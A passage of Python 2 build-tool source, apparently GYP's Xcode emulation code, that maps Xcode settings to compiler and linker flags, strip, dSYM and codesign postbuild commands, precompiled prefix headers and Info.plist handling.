'shared_library': 'mh_dylib',
'loadable_module': 'mh_bundle',
}[self.spec['type']]
def _GetBundleBinaryPath(self):
"""Returns the name of the bundle binary of by this target.
E.g. Chromium.app/Contents/MacOS/Chromium. Only valid for bundles."""
assert self._IsBundle()
if self.spec['type'] in ('shared_library') or self.isIOS:
path = self.GetBundleContentsFolderPath()
elif self.spec['type'] in ('executable', 'loadable_module'):
path = os.path.join(self.GetBundleContentsFolderPath(), 'MacOS')
return os.path.join(path, self.GetExecutableName())
def _GetStandaloneExecutableSuffix(self):
if 'product_extension' in self.spec:
return '.' + self.spec['product_extension']
return {
'executable': '',
'static_library': '.a',
'shared_library': '.dylib',
'loadable_module': '.so',
}[self.spec['type']]
def _GetStandaloneExecutablePrefix(self):
return self.spec.get('product_prefix', {
'executable': '',
'static_library': 'lib',
'shared_library': 'lib',
# Non-bundled loadable_modules are called foo.so for some reason
# (that is, .so and no prefix) with the xcode build -- match that.
'loadable_module': '',
}[self.spec['type']])
def _GetStandaloneBinaryPath(self):
"""Returns the name of the non-bundle binary represented by this target.
E.g. hello_world. Only valid for non-bundles."""
assert not self._IsBundle()
assert self.spec['type'] in (
'executable', 'shared_library', 'static_library', 'loadable_module'), (
'Unexpected type %s' % self.spec['type'])
target = self.spec['target_name']
if self.spec['type'] == 'static_library':
if target[:3] == 'lib':
target = target[3:]
elif self.spec['type'] in ('loadable_module', 'shared_library'):
if target[:3] == 'lib':
target = target[3:]
target_prefix = self._GetStandaloneExecutablePrefix()
target = self.spec.get('product_name', target)
target_ext = self._GetStandaloneExecutableSuffix()
return target_prefix + target + target_ext
def GetExecutableName(self):
"""Returns the executable name of the bundle represented by this target.
E.g. Chromium."""
if self._IsBundle():
return self.spec.get('product_name', self.spec['target_name'])
else:
return self._GetStandaloneBinaryPath()
def GetExecutablePath(self):
"""Returns the directory name of the bundle represented by this target. E.g.
Chromium.app/Contents/MacOS/Chromium."""
if self._IsBundle():
return self._GetBundleBinaryPath()
else:
return self._GetStandaloneBinaryPath()
def GetActiveArchs(self, configname):
"""Returns the architectures this target should be built for."""
# TODO: Look at VALID_ARCHS, ONLY_ACTIVE_ARCH; possibly set
# CURRENT_ARCH / NATIVE_ARCH env vars?
return self.xcode_settings[configname].get('ARCHS', ['i386'])
def _GetStdout(self, cmdlist):
job = subprocess.Popen(cmdlist, stdout=subprocess.PIPE)
out = job.communicate()[0]
if job.returncode != 0:
sys.stderr.write(out + '\n')
raise GypError('Error %d running %s' % (job.returncode, cmdlist[0]))
return out.rstrip('\n')
def _GetSdkVersionInfoItem(self, sdk, infoitem):
return self._GetStdout(['xcodebuild', '-version', '-sdk', sdk, infoitem])
def _SdkRoot(self, configname):
if configname is None:
configname = self.configname
return self.GetPerConfigSetting('SDKROOT', configname, default='')
def _SdkPath(self, configname=None):
sdk_root = self._SdkRoot(configname)
if sdk_root.startswith('/'):
return sdk_root
if sdk_root not in XcodeSettings._sdk_path_cache:
XcodeSettings._sdk_path_cache[sdk_root] = self._GetSdkVersionInfoItem(
sdk_root, 'Path')
return XcodeSettings._sdk_path_cache[sdk_root]
def _AppendPlatformVersionMinFlags(self, lst):
self._Appendf(lst, 'MACOSX_DEPLOYMENT_TARGET', '-mmacosx-version-min=%s')
if 'IPHONEOS_DEPLOYMENT_TARGET' in self._Settings():
# TODO: Implement this better?
sdk_path_basename = os.path.basename(self._SdkPath())
if sdk_path_basename.lower().startswith('iphonesimulator'):
self._Appendf(lst, 'IPHONEOS_DEPLOYMENT_TARGET',
'-mios-simulator-version-min=%s')
else:
self._Appendf(lst, 'IPHONEOS_DEPLOYMENT_TARGET',
'-miphoneos-version-min=%s')
def GetCflags(self, configname, arch=None):
"""Returns flags that need to be added to .c, .cc, .m, and .mm
compilations."""
# This functions (and the similar ones below) do not offer complete
# emulation of all xcode_settings keys. They're implemented on demand.
self.configname = configname
cflags = []
sdk_root = self._SdkPath()
if 'SDKROOT' in self._Settings():
cflags.append('-isysroot %s' % sdk_root)
if self._Test('CLANG_WARN_CONSTANT_CONVERSION', 'YES', default='NO'):
cflags.append('-Wconstant-conversion')
if self._Test('GCC_CHAR_IS_UNSIGNED_CHAR', 'YES', default='NO'):
cflags.append('-funsigned-char')
if self._Test('GCC_CW_ASM_SYNTAX', 'YES', default='YES'):
cflags.append('-fasm-blocks')
if 'GCC_DYNAMIC_NO_PIC' in self._Settings():
if self._Settings()['GCC_DYNAMIC_NO_PIC'] == 'YES':
cflags.append('-mdynamic-no-pic')
else:
pass
# TODO: In this case, it depends on the target. xcode passes
# mdynamic-no-pic by default for executable and possibly static lib
# according to mento
if self._Test('GCC_ENABLE_PASCAL_STRINGS', 'YES', default='YES'):
cflags.append('-mpascal-strings')
self._Appendf(cflags, 'GCC_OPTIMIZATION_LEVEL', '-O%s', default='s')
if self._Test('GCC_GENERATE_DEBUGGING_SYMBOLS', 'YES', default='YES'):
dbg_format = self._Settings().get('DEBUG_INFORMATION_FORMAT', 'dwarf')
if dbg_format == 'dwarf':
cflags.append('-gdwarf-2')
elif dbg_format == 'stabs':
raise NotImplementedError('stabs debug format is not supported yet.')
elif dbg_format == 'dwarf-with-dsym':
cflags.append('-gdwarf-2')
else:
raise NotImplementedError('Unknown debug format %s' % dbg_format)
if self._Settings().get('GCC_STRICT_ALIASING') == 'YES':
cflags.append('-fstrict-aliasing')
elif self._Settings().get('GCC_STRICT_ALIASING') == 'NO':
cflags.append('-fno-strict-aliasing')
if self._Test('GCC_SYMBOLS_PRIVATE_EXTERN', 'YES', default='NO'):
cflags.append('-fvisibility=hidden')
if self._Test('GCC_TREAT_WARNINGS_AS_ERRORS', 'YES', default='NO'):
cflags.append('-Werror')
if self._Test('GCC_WARN_ABOUT_MISSING_NEWLINE', 'YES', default='NO'):
cflags.append('-Wnewline-eof')
self._AppendPlatformVersionMinFlags(cflags)
# TODO:
if self._Test('COPY_PHASE_STRIP', 'YES', default='NO'):
self._WarnUnimplemented('COPY_PHASE_STRIP')
self._WarnUnimplemented('GCC_DEBUGGING_SYMBOLS')
self._WarnUnimplemented('GCC_ENABLE_OBJC_EXCEPTIONS')
# TODO: This is exported correctly, but assigning to it is not supported.
self._WarnUnimplemented('MACH_O_TYPE')
self._WarnUnimplemented('PRODUCT_TYPE')
if arch is not None:
archs = [arch]
else:
archs = self._Settings().get('ARCHS', ['i386'])
if len(archs) != 1:
# TODO: Supporting fat binaries will be annoying.
self._WarnUnimplemented('ARCHS')
archs = ['i386']
cflags.append('-arch ' + archs[0])
if archs[0] in ('i386', 'x86_64'):
if self._Test('GCC_ENABLE_SSE3_EXTENSIONS', 'YES', default='NO'):
cflags.append('-msse3')
if self._Test('GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS', 'YES',
default='NO'):
cflags.append('-mssse3') # Note 3rd 's'.
if self._Test('GCC_ENABLE_SSE41_EXTENSIONS', 'YES', default='NO'):
cflags.append('-msse4.1')
if self._Test('GCC_ENABLE_SSE42_EXTENSIONS', 'YES', default='NO'):
cflags.append('-msse4.2')
cflags += self._Settings().get('WARNING_CFLAGS', [])
config = self.spec['configurations'][self.configname]
framework_dirs = config.get('mac_framework_dirs', [])
for directory in framework_dirs:
cflags.append('-F' + directory.replace('$(SDKROOT)', sdk_root))
self.configname = None
return cflags
def GetCflagsC(self, configname):
"""Returns flags that need to be added to .c, and .m compilations."""
self.configname = configname
cflags_c = []
if self._Settings().get('GCC_C_LANGUAGE_STANDARD', '') == 'ansi':
cflags_c.append('-ansi')
else:
self._Appendf(cflags_c, 'GCC_C_LANGUAGE_STANDARD', '-std=%s')
cflags_c += self._Settings().get('OTHER_CFLAGS', [])
self.configname = None
return cflags_c
def GetCflagsCC(self, configname):
"""Returns flags that need to be added to .cc, and .mm compilations."""
self.configname = configname
cflags_cc = []
clang_cxx_language_standard = self._Settings().get(
'CLANG_CXX_LANGUAGE_STANDARD')
# Note: Don't make c++0x to c++11 so that c++0x can be used with older
# clangs that don't understand c++11 yet (like Xcode 4.2's).
if clang_cxx_language_standard:
cflags_cc.append('-std=%s' % clang_cxx_language_standard)
self._Appendf(cflags_cc, 'CLANG_CXX_LIBRARY', '-stdlib=%s')
if self._Test('GCC_ENABLE_CPP_RTTI', 'NO', default='YES'):
cflags_cc.append('-fno-rtti')
if self._Test('GCC_ENABLE_CPP_EXCEPTIONS', 'NO', default='YES'):
cflags_cc.append('-fno-exceptions')
if self._Test('GCC_INLINES_ARE_PRIVATE_EXTERN', 'YES', default='NO'):
cflags_cc.append('-fvisibility-inlines-hidden')
if self._Test('GCC_THREADSAFE_STATICS', 'NO', default='YES'):
cflags_cc.append('-fno-threadsafe-statics')
# Note: This flag is a no-op for clang, it only has an effect for gcc.
if self._Test('GCC_WARN_ABOUT_INVALID_OFFSETOF_MACRO', 'NO', default='YES'):
cflags_cc.append('-Wno-invalid-offsetof')
other_ccflags = []
for flag in self._Settings().get('OTHER_CPLUSPLUSFLAGS', ['$(inherited)']):
# TODO: More general variable expansion. Missing in many other places too.
if flag in ('$inherited', '$(inherited)', '${inherited}'):
flag = '$OTHER_CFLAGS'
if flag in ('$OTHER_CFLAGS', '$(OTHER_CFLAGS)', '${OTHER_CFLAGS}'):
other_ccflags += self._Settings().get('OTHER_CFLAGS', [])
else:
other_ccflags.append(flag)
cflags_cc += other_ccflags
self.configname = None
return cflags_cc
def _AddObjectiveCGarbageCollectionFlags(self, flags):
gc_policy = self._Settings().get('GCC_ENABLE_OBJC_GC', 'unsupported')
if gc_policy == 'supported':
flags.append('-fobjc-gc')
elif gc_policy == 'required':
flags.append('-fobjc-gc-only')
def _AddObjectiveCARCFlags(self, flags):
if self._Test('CLANG_ENABLE_OBJC_ARC', 'YES', default='NO'):
flags.append('-fobjc-arc')
def _AddObjectiveCMissingPropertySynthesisFlags(self, flags):
if self._Test('CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS',
'YES', default='NO'):
flags.append('-Wobjc-missing-property-synthesis')
def GetCflagsObjC(self, configname):
"""Returns flags that need to be added to .m compilations."""
self.configname = configname
cflags_objc = []
self._AddObjectiveCGarbageCollectionFlags(cflags_objc)
self._AddObjectiveCARCFlags(cflags_objc)
self._AddObjectiveCMissingPropertySynthesisFlags(cflags_objc)
self.configname = None
return cflags_objc
def GetCflagsObjCC(self, configname):
"""Returns flags that need to be added to .mm compilations."""
self.configname = configname
cflags_objcc = []
self._AddObjectiveCGarbageCollectionFlags(cflags_objcc)
self._AddObjectiveCARCFlags(cflags_objcc)
self._AddObjectiveCMissingPropertySynthesisFlags(cflags_objcc)
if self._Test('GCC_OBJC_CALL_CXX_CDTORS', 'YES', default='NO'):
cflags_objcc.append('-fobjc-call-cxx-cdtors')
self.configname = None
return cflags_objcc
def GetInstallNameBase(self):
"""Return DYLIB_INSTALL_NAME_BASE for this target."""
# Xcode sets this for shared_libraries, and for nonbundled loadable_modules.
if (self.spec['type'] != 'shared_library' and
(self.spec['type'] != 'loadable_module' or self._IsBundle())):
return None
install_base = self.GetPerTargetSetting(
'DYLIB_INSTALL_NAME_BASE',
default='/Library/Frameworks' if self._IsBundle() else '/usr/local/lib')
return install_base
def _StandardizePath(self, path):
"""Do :standardizepath processing for path."""
# I'm not quite sure what :standardizepath does. Just call normpath(),
# but don't let @executable_path/../foo collapse to foo.
if '/' in path:
prefix, rest = '', path
if path.startswith('@'):
prefix, rest = path.split('/', 1)
rest = os.path.normpath(rest) # :standardizepath
path = os.path.join(prefix, rest)
return path
def GetInstallName(self):
"""Return LD_DYLIB_INSTALL_NAME for this target."""
# Xcode sets this for shared_libraries, and for nonbundled loadable_modules.
if (self.spec['type'] != 'shared_library' and
(self.spec['type'] != 'loadable_module' or self._IsBundle())):
return None
default_install_name = \
'$(DYLIB_INSTALL_NAME_BASE:standardizepath)/$(EXECUTABLE_PATH)'
install_name = self.GetPerTargetSetting(
'LD_DYLIB_INSTALL_NAME', default=default_install_name)
# Hardcode support for the variables used in chromium for now, to
# unblock people using the make build.
if '$' in install_name:
assert install_name in ('$(DYLIB_INSTALL_NAME_BASE:standardizepath)/'
'$(WRAPPER_NAME)/$(PRODUCT_NAME)', default_install_name), (
'Variables in LD_DYLIB_INSTALL_NAME are not generally supported '
'yet in target \'%s\' (got \'%s\')' %
(self.spec['target_name'], install_name))
install_name = install_name.replace(
'$(DYLIB_INSTALL_NAME_BASE:standardizepath)',
self._StandardizePath(self.GetInstallNameBase()))
if self._IsBundle():
# These are only valid for bundles, hence the |if|.
install_name = install_name.replace(
'$(WRAPPER_NAME)', self.GetWrapperName())
install_name = install_name.replace(
'$(PRODUCT_NAME)', self.GetProductName())
else:
assert '$(WRAPPER_NAME)' not in install_name
assert '$(PRODUCT_NAME)' not in install_name
install_name = install_name.replace(
'$(EXECUTABLE_PATH)', self.GetExecutablePath())
return install_name
def _MapLinkerFlagFilename(self, ldflag, gyp_to_build_path):
"""Checks if ldflag contains a filename and if so remaps it from
gyp-directory-relative to build-directory-relative."""
# This list is expanded on demand.
# They get matched as:
# -exported_symbols_list file
# -Wl,exported_symbols_list file
# -Wl,exported_symbols_list,file
LINKER_FILE = '(\S+)'
WORD = '\S+'
linker_flags = [
['-exported_symbols_list', LINKER_FILE], # Needed for NaCl.
['-unexported_symbols_list', LINKER_FILE],
['-reexported_symbols_list', LINKER_FILE],
['-sectcreate', WORD, WORD, LINKER_FILE], # Needed for remoting.
]
for flag_pattern in linker_flags:
regex = re.compile('(?:-Wl,)?' + '[ ,]'.join(flag_pattern))
m = regex.match(ldflag)
if m:
ldflag = ldflag[:m.start(1)] + gyp_to_build_path(m.group(1)) + \
ldflag[m.end(1):]
# Required for ffmpeg (no idea why they don't use LIBRARY_SEARCH_PATHS,
# TODO(thakis): Update ffmpeg.gyp):
if ldflag.startswith('-L'):
ldflag = '-L' + gyp_to_build_path(ldflag[len('-L'):])
return ldflag
def GetLdflags(self, configname, product_dir, gyp_to_build_path, arch=None):
"""Returns flags that need to be passed to the linker.
Args:
configname: The name of the configuration to get ld flags for.
product_dir: The directory where products such static and dynamic
libraries are placed. This is added to the library search path.
gyp_to_build_path: A function that converts paths relative to the
current gyp file to paths relative to the build direcotry.
"""
self.configname = configname
ldflags = []
# The xcode build is relative to a gyp file's directory, and OTHER_LDFLAGS
# can contain entries that depend on this. Explicitly absolutify these.
for ldflag in self._Settings().get('OTHER_LDFLAGS', []):
ldflags.append(self._MapLinkerFlagFilename(ldflag, gyp_to_build_path))
if self._Test('DEAD_CODE_STRIPPING', 'YES', default='NO'):
ldflags.append('-Wl,-dead_strip')
if self._Test('PREBINDING', 'YES', default='NO'):
ldflags.append('-Wl,-prebind')
self._Appendf(
ldflags, 'DYLIB_COMPATIBILITY_VERSION', '-compatibility_version %s')
self._Appendf(
ldflags, 'DYLIB_CURRENT_VERSION', '-current_version %s')
self._AppendPlatformVersionMinFlags(ldflags)
if 'SDKROOT' in self._Settings():
ldflags.append('-isysroot ' + self._SdkPath())
for library_path in self._Settings().get('LIBRARY_SEARCH_PATHS', []):
ldflags.append('-L' + gyp_to_build_path(library_path))
if 'ORDER_FILE' in self._Settings():
ldflags.append('-Wl,-order_file ' +
'-Wl,' + gyp_to_build_path(
self._Settings()['ORDER_FILE']))
if arch is not None:
archs = [arch]
else:
archs = self._Settings().get('ARCHS', ['i386'])
if len(archs) != 1:
# TODO: Supporting fat binaries will be annoying.
self._WarnUnimplemented('ARCHS')
archs = ['i386']
ldflags.append('-arch ' + archs[0])
# Xcode adds the product directory by default.
ldflags.append('-L' + product_dir)
install_name = self.GetInstallName()
if install_name and self.spec['type'] != 'loadable_module':
ldflags.append('-install_name ' + install_name.replace(' ', r'\ '))
for rpath in self._Settings().get('LD_RUNPATH_SEARCH_PATHS', []):
ldflags.append('-Wl,-rpath,' + rpath)
config = self.spec['configurations'][self.configname]
framework_dirs = config.get('mac_framework_dirs', [])
for directory in framework_dirs:
ldflags.append('-F' + directory.replace('$(SDKROOT)', self._SdkPath()))
self.configname = None
return ldflags
def GetLibtoolflags(self, configname):
"""Returns flags that need to be passed to the static linker.
Args:
configname: The name of the configuration to get ld flags for.
"""
self.configname = configname
libtoolflags = []
for libtoolflag in self._Settings().get('OTHER_LDFLAGS', []):
libtoolflags.append(libtoolflag)
# TODO(thakis): ARCHS?
self.configname = None
return libtoolflags
def GetPerTargetSettings(self):
"""Gets a list of all the per-target settings. This will only fetch keys
whose values are the same across all configurations."""
first_pass = True
result = {}
for configname in sorted(self.xcode_settings.keys()):
if first_pass:
result = dict(self.xcode_settings[configname])
first_pass = False
else:
for key, value in self.xcode_settings[configname].iteritems():
if key not in result:
continue
elif result[key] != value:
del result[key]
return result
def GetPerConfigSetting(self, setting, configname, default=None):
if configname in self.xcode_settings:
return self.xcode_settings[configname].get(setting, default)
else:
return self.GetPerTargetSetting(setting, default)
def GetPerTargetSetting(self, setting, default=None):
"""Tries to get xcode_settings.setting from spec. Assumes that the setting
has the same value in all configurations and throws otherwise."""
is_first_pass = True
result = None
for configname in sorted(self.xcode_settings.keys()):
if is_first_pass:
result = self.xcode_settings[configname].get(setting, None)
is_first_pass = False
else:
assert result == self.xcode_settings[configname].get(setting, None), (
"Expected per-target setting for '%s', got per-config setting "
"(target %s)" % (setting, self.spec['target_name']))
if result is None:
return default
return result
def _GetStripPostbuilds(self, configname, output_binary, quiet):
"""Returns a list of shell commands that contain the shell commands
neccessary to strip this target's binary. These should be run as postbuilds
before the actual postbuilds run."""
self.configname = configname
result = []
if (self._Test('DEPLOYMENT_POSTPROCESSING', 'YES', default='NO') and
self._Test('STRIP_INSTALLED_PRODUCT', 'YES', default='NO')):
default_strip_style = 'debugging'
if self.spec['type'] == 'loadable_module' and self._IsBundle():
default_strip_style = 'non-global'
elif self.spec['type'] == 'executable':
default_strip_style = 'all'
strip_style = self._Settings().get('STRIP_STYLE', default_strip_style)
strip_flags = {
'all': '',
'non-global': '-x',
'debugging': '-S',
}[strip_style]
explicit_strip_flags = self._Settings().get('STRIPFLAGS', '')
if explicit_strip_flags:
strip_flags += ' ' + _NormalizeEnvVarReferences(explicit_strip_flags)
if not quiet:
result.append('echo STRIP\\(%s\\)' % self.spec['target_name'])
result.append('strip %s %s' % (strip_flags, output_binary))
self.configname = None
return result
def _GetDebugInfoPostbuilds(self, configname, output, output_binary, quiet):
"""Returns a list of shell commands that contain the shell commands
neccessary to massage this target's debug information. These should be run
as postbuilds before the actual postbuilds run."""
self.configname = configname
# For static libraries, no dSYMs are created.
result = []
if (self._Test('GCC_GENERATE_DEBUGGING_SYMBOLS', 'YES', default='YES') and
self._Test(
'DEBUG_INFORMATION_FORMAT', 'dwarf-with-dsym', default='dwarf') and
self.spec['type'] != 'static_library'):
if not quiet:
result.append('echo DSYMUTIL\\(%s\\)' % self.spec['target_name'])
result.append('dsymutil %s -o %s' % (output_binary, output + '.dSYM'))
self.configname = None
return result
def _GetTargetPostbuilds(self, configname, output, output_binary,
quiet=False):
"""Returns a list of shell commands that contain the shell commands
to run as postbuilds for this target, before the actual postbuilds."""
# dSYMs need to build before stripping happens.
return (
self._GetDebugInfoPostbuilds(configname, output, output_binary, quiet) +
self._GetStripPostbuilds(configname, output_binary, quiet))
def _GetIOSPostbuilds(self, configname, output_binary):
"""Return a shell command to codesign the iOS output binary so it can
be deployed to a device. This should be run as the very last step of the
build."""
if not (self.isIOS and self.spec['type'] == "executable"):
return []
identity = self.xcode_settings[configname].get('CODE_SIGN_IDENTITY', '')
if identity == '':
return []
if identity not in XcodeSettings._codesigning_key_cache:
proc = subprocess.Popen(['security', 'find-identity', '-p', 'codesigning',
'-v'], stdout=subprocess.PIPE)
output = proc.communicate()[0].strip()
key = None
for item in output.split("\n"):
if identity in item:
assert key == None, (
"Multiple codesigning identities for identity: %s" %
identity)
key = item.split(' ')[1]
XcodeSettings._codesigning_key_cache[identity] = key
key = XcodeSettings._codesigning_key_cache[identity]
if key:
# Warn for any unimplemented signing xcode keys.
unimpl = ['CODE_SIGN_RESOURCE_RULES_PATH', 'OTHER_CODE_SIGN_FLAGS',
'CODE_SIGN_ENTITLEMENTS']
keys = set(self.xcode_settings[configname].keys())
unimpl = set(unimpl) & keys
if unimpl:
print 'Warning: Some codesign keys not implemented, ignoring:', \
' '.join(unimpl)
return ['codesign --force --sign %s %s' % (key, output_binary)]
return []
def AddImplicitPostbuilds(self, configname, output, output_binary,
postbuilds=[], quiet=False):
"""Returns a list of shell commands that should run before and after
|postbuilds|."""
assert output_binary is not None
pre = self._GetTargetPostbuilds(configname, output, output_binary, quiet)
post = self._GetIOSPostbuilds(configname, output_binary)
return pre + postbuilds + post
def _AdjustLibrary(self, library, config_name=None):
if library.endswith('.framework'):
l = '-framework ' + os.path.splitext(os.path.basename(library))[0]
else:
m = self.library_re.match(library)
if m:
l = '-l' + m.group(1)
else:
l = library
return l.replace('$(SDKROOT)', self._SdkPath(config_name))
def AdjustLibraries(self, libraries, config_name=None):
"""Transforms entries like 'Cocoa.framework' in libraries into entries like
'-framework Cocoa', 'libcrypto.dylib' into '-lcrypto', etc.
"""
libraries = [self._AdjustLibrary(library, config_name)
for library in libraries]
return libraries
def _BuildMachineOSBuild(self):
return self._GetStdout(['sw_vers', '-buildVersion'])
def _XcodeVersion(self):
# `xcodebuild -version` output looks like
# Xcode 4.6.3
# Build version 4H1503
# or like
# Xcode 3.2.6
# Component versions: DevToolsCore-1809.0; DevToolsSupport-1806.0
# BuildVersion: 10M2518
# Convert that to '0463', '4H1503'.
version_list = self._GetStdout(['xcodebuild', '-version']).splitlines()
version = version_list[0]
build = version_list[-1]
# Be careful to convert "4.2" to "0420":
version = version.split()[-1].replace('.', '')
version = (version + '0' * (3 - len(version))).zfill(4)
build = build.split()[-1]
return version, build
def _XcodeIOSDeviceFamily(self, configname):
family = self.xcode_settings[configname].get('TARGETED_DEVICE_FAMILY', '1')
return [int(x) for x in family.split(',')]
def GetExtraPlistItems(self, configname=None):
"""Returns a dictionary with extra items to insert into Info.plist."""
if configname not in XcodeSettings._plist_cache:
cache = {}
cache['BuildMachineOSBuild'] = self._BuildMachineOSBuild()
xcode, xcode_build = self._XcodeVersion()
cache['DTXcode'] = xcode
cache['DTXcodeBuild'] = xcode_build
sdk_root = self._SdkRoot(configname)
cache['DTSDKName'] = sdk_root
if xcode >= '0430':
cache['DTSDKBuild'] = self._GetSdkVersionInfoItem(
sdk_root, 'ProductBuildVersion')
else:
cache['DTSDKBuild'] = cache['BuildMachineOSBuild']
if self.isIOS:
cache['DTPlatformName'] = cache['DTSDKName']
if configname.endswith("iphoneos"):
cache['DTPlatformVersion'] = self._GetSdkVersionInfoItem(
sdk_root, 'ProductVersion')
cache['CFBundleSupportedPlatforms'] = ['iPhoneOS']
else:
cache['CFBundleSupportedPlatforms'] = ['iPhoneSimulator']
XcodeSettings._plist_cache[configname] = cache
# Include extra plist items that are per-target, not per global
# XcodeSettings.
items = dict(XcodeSettings._plist_cache[configname])
if self.isIOS:
items['UIDeviceFamily'] = self._XcodeIOSDeviceFamily(configname)
return items
class MacPrefixHeader(object):
"""A class that helps with emulating Xcode's GCC_PREFIX_HEADER feature.
This feature consists of several pieces:
* If GCC_PREFIX_HEADER is present, all compilations in that project get an
additional |-include path_to_prefix_header| cflag.
* If GCC_PRECOMPILE_PREFIX_HEADER is present too, then the prefix header is
instead compiled, and all other compilations in the project get an
additional |-include path_to_compiled_header| instead.
+ Compiled prefix headers have the extension gch. There is one gch file for
every language used in the project (c, cc, m, mm), since gch files for
different languages aren't compatible.
+ gch files themselves are built with the target's normal cflags, but they
obviously don't get the |-include| flag. Instead, they need a -x flag that
describes their language.
+ All o files in the target need to depend on the gch file, to make sure
it's built before any o file is built.
This class helps with some of these tasks, but it needs help from the build
system for writing dependencies to the gch files, for writing build commands
for the gch files, and for figuring out the location of the gch files.
"""
def __init__(self, xcode_settings,
gyp_path_to_build_path, gyp_path_to_build_output):
"""If xcode_settings is None, all methods on this class are no-ops.
Args:
gyp_path_to_build_path: A function that takes a gyp-relative path,
and returns a path relative to the build directory.
gyp_path_to_build_output: A function that takes a gyp-relative path and
a language code ('c', 'cc', 'm', or 'mm'), and that returns a path
to where the output of precompiling that path for that language
should be placed (without the trailing '.gch').
"""
# This doesn't support per-configuration prefix headers. Good enough
# for now.
self.header = None
self.compile_headers = False
if xcode_settings:
self.header = xcode_settings.GetPerTargetSetting('GCC_PREFIX_HEADER')
self.compile_headers = xcode_settings.GetPerTargetSetting(
'GCC_PRECOMPILE_PREFIX_HEADER', default='NO') != 'NO'
self.compiled_headers = {}
if self.header:
if self.compile_headers:
for lang in ['c', 'cc', 'm', 'mm']:
self.compiled_headers[lang] = gyp_path_to_build_output(
self.header, lang)
self.header = gyp_path_to_build_path(self.header)
def _CompiledHeader(self, lang, arch):
assert self.compile_headers
h = self.compiled_headers[lang]
if arch:
h += '.' + arch
return h
def GetInclude(self, lang, arch=None):
"""Gets the cflags to include the prefix header for language |lang|."""
if self.compile_headers and lang in self.compiled_headers:
return '-include %s' % self._CompiledHeader(lang, arch)
elif self.header:
return '-include %s' % self.header
else:
return ''
def _Gch(self, lang, arch):
"""Returns the actual file name of the prefix header for language |lang|."""
assert self.compile_headers
return self._CompiledHeader(lang, arch) + '.gch'
def GetObjDependencies(self, sources, objs, arch=None):
"""Given a list of source files and the corresponding object files, returns
a list of (source, object, gch) tuples, where |gch| is the build-directory
relative path to the gch file each object file depends on. |compilable[i]|
has to be the source file belonging to |objs[i]|."""
if not self.header or not self.compile_headers:
return []
result = []
for source, obj in zip(sources, objs):
ext = os.path.splitext(source)[1]
lang = {
'.c': 'c',
'.cpp': 'cc', '.cc': 'cc', '.cxx': 'cc',
'.m': 'm',
'.mm': 'mm',
}.get(ext, None)
if lang:
result.append((source, obj, self._Gch(lang, arch)))
return result
def GetPchBuildCommands(self, arch=None):
"""Returns [(path_to_gch, language_flag, language, header)].
|path_to_gch| and |header| are relative to the build directory.
"""
if not self.header or not self.compile_headers:
return []
return [
(self._Gch('c', arch), '-x c-header', 'c', self.header),
(self._Gch('cc', arch), '-x c++-header', 'cc', self.header),
(self._Gch('m', arch), '-x objective-c-header', 'm', self.header),
(self._Gch('mm', arch), '-x objective-c++-header', 'mm', self.header),
]
def MergeGlobalXcodeSettingsToSpec(global_dict, spec):
"""Merges the global xcode_settings dictionary into each configuration of the
target represented by spec. For keys that are both in the global and the local
xcode_settings dict, the local key gets precendence.
"""
# The xcode generator special-cases global xcode_settings and does something
# that amounts to merging in the global xcode_settings into each local
# xcode_settings dict.
global_xcode_settings = global_dict.get('xcode_settings', {})
for config in spec['configurations'].values():
if 'xcode_settings' in config:
new_settings = global_xcode_settings.copy()
new_settings.update(config['xcode_settings'])
config['xcode_settings'] = new_settings
def IsMacBundle(flavor, spec):
"""Returns if |spec| should be treated as a bundle.
Bundles are directories with a certain subdirectory structure, instead of
just a single file. Bundle rules do not produce a binary but also package
resources into that directory."""
is_mac_bundle = (int(spec.get('mac_bundle', 0)) != 0 and flavor == 'mac')
if is_mac_bundle:
assert spec['type'] != 'none', (
'mac_bundle targets cannot have type none (target "%s")' %
spec['target_name'])
return is_mac_bundle
def GetMacBundleResources(product_dir, xcode_settings, resources):
"""Yields (output, resource) pairs for every resource in |resources|.
Only call this for mac bundle targets.
Args:
product_dir: Path to the directory containing the output bundle,
relative to the build directory.
xcode_settings: The XcodeSettings of the current target.
resources: A list of bundle resources, relative to the build directory.
"""
dest = os.path.join(product_dir,
xcode_settings.GetBundleResourceFolder())
for res in resources:
output = dest
# The make generator doesn't support it, so forbid it everywhere
# to keep the generators more interchangable.
assert ' ' not in res, (
"Spaces in resource filenames not supported (%s)" % res)
# Split into (path,file).
res_parts = os.path.split(res)
# Now split the path into (prefix,maybe.lproj).
lproj_parts = os.path.split(res_parts[0])
# If the resource lives in a .lproj bundle, add that to the destination.
if lproj_parts[1].endswith('.lproj'):
output = os.path.join(output, lproj_parts[1])
output = os.path.join(output, res_parts[1])
# Compiled XIB files are referred to by .nib.
if output.endswith('.xib'):
output = os.path.splitext(output)[0] + '.nib'
# Compiled storyboard files are referred to by .storyboardc.
if output.endswith('.storyboard'):
output = os.path.splitext(output)[0] + '.storyboardc'
yield output, res
def GetMacInfoPlist(product_dir, xcode_settings, gyp_path_to_build_path):
"""Returns (info_plist, dest_plist, defines, extra_env), where:
* |info_plist| is the source plist path, relative to the
build directory,
* |dest_plist| is the destination plist path, relative to the
build directory,
* |defines| is a list of preprocessor defines (empty if the plist
shouldn't be preprocessed,
* |extra_env| is a dict of env variables that should be exported when
invoking |mac_tool copy-info-plist|.
Only call this for mac bundle targets.
Args:
product_dir: Path to the directory containing the output bundle,
relative to the build directory.
xcode_settings: The XcodeSettings of the current target.
gyp_to_build_path: A function that converts paths relative to the
current gyp file to paths relative to the build direcotry.
"""
info_plist = xcode_settings.GetPerTargetSetting('INFOPLIST_FILE')
if not info_plist:
return None, None, [], {}
# The make generator doesn't support it, so forbid it everywhere
# to keep the generators more interchangable.
assert ' ' not in info_plist, (
"Spaces in Info.plist filenames not supported (%s)" % info_plist)
info_plist = gyp_path_to_build_path(info_plist)
# If explicitly set to preprocess the plist, invoke the C preprocessor and
# specify any defines as -D flags.
if xcode_settings.GetPerTargetSetting(
'INFOPLIST_PREPROCESS', default='NO') == 'YES':
# Create an intermediate file based on the path.
defines = shlex.split(xcode_settings.GetPerTargetSetting(
'INFOPLIST_PREPROCESSOR_DEFINITIONS', default=''))
else:
defines = []
dest_plist = os.path.join(product_dir, xcode_settings.GetBundlePlistPath())
extra_env = xcode_settings.GetPerTargetSettings()
return info_plist, dest_plist, defines, extra_env
def _GetXcodeEnv(xcode_settings, built_products_dir, srcroot, configuration,
additional_settings=None):
"""Return the environment variables that Xcode would set. See
